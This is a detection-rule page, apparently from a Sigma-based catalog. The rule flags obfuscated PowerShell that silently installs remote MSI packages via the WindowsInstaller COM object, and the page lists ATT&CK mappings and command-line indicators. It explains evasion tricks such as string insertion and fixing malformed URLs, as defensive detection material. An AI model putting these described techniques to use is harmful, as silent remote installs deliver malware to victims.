Obfuscated PowerShell MSI Install via WindowsInstaller COM

Severity: high
Author: Meroujan Antonyan (vx3r)
Source: upstream

Detects the execution of obfuscated PowerShell commands that attempt to install MSI packages via the Windows Installer COM object (WindowsInstaller.Installer). The technique involves manipulating strings to hide functionality, such as constructing class names using string insertion (e.g., 'indowsInstaller.Installer'.Insert(0,'W')) and correcting malformed URLs (e.g., converting 'htps://' to 'https://') at runtime. This behavior is commonly associated with malware loaders or droppers that aim to bypass static detection by hiding intent in runtime-generated strings and using legitimate tools for code execution. The use of InstallProduct and COM object creation, particularly combined with hidden window execution and suppressed UI, indicates an attempt to install software (likely malicious) without user interaction.

MITRE ATT&CK coverage

Tactic	Techniques
Execution	`T1059.001` Command and Scripting Interpreter: PowerShell
Defense Evasion	`T1027.010` Obfuscated Files or Information: Command Obfuscation, `T1218.007` System Binary Proxy Execution: Msiexec

Event coverage

Provider	Event ID	Title
Sysmon	1	Process creation

Stages and Predicates

Stage 1: `all of selection_img`

or:
Image|endswith: '\powershell.exe'
Image|endswith: '\powershell_ise.exe'
Image|endswith: '\pwsh.exe'
OriginalFileName: PowerShell.EXE
OriginalFileName: PowerShell_ISE.EXE
OriginalFileName: pwsh.dll

Stage 2: `all of selection_cli`

CommandLine|contains: -ComObject
CommandLine|contains: '.Insert('
CommandLine|contains: 'InstallProduct('
CommandLine|contains: UILevel

Indicators

Each row is a field, operator, and value that the rule matches. The corpus column counts how many other rules in the catalog look for the same combination: high numbers point to widely-used, community-vetted indicators. Blank or 1 shows that the indicator is specific to this rule.

Field	Kind	Values
`CommandLine`	match	`-ComObject` corpus 2 (sigma 2) `.Insert(` `InstallProduct(` corpus 2 (sigma 2) `UILevel`
`Image`	ends_with	`\powershell.exe` corpus 143 (sigma 143) `\powershell_ise.exe` corpus 27 (sigma 27) `\pwsh.exe` corpus 140 (sigma 140)
`OriginalFileName`	eq	`PowerShell.EXE` corpus 64 (sigma 60, splunk 4) `PowerShell_ISE.EXE` corpus 6 (sigma 6) `pwsh.dll` corpus 72 (sigma 68, splunk 4)